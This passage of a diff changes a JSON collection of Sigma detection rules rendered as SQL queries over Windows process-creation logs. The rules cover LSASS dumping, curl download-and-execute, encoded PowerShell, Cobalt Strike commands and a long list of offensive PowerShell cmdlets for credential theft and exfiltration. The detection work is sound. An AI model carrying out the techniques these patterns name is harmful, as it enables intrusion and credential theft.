CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1027" ], 
"falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "status": "experimental", + "description": "Detects usage of wmic to start or stop a service", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers 
are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "status": "stable", - "description": "Detects Winword starting 
uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "status": "test", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" + ], + 
"falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + }, + { + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", + "tags": [ + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": 
"647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a 
VSS/VDS Provider as a COM+ application.", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE 
'%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine 
LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' 
ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' 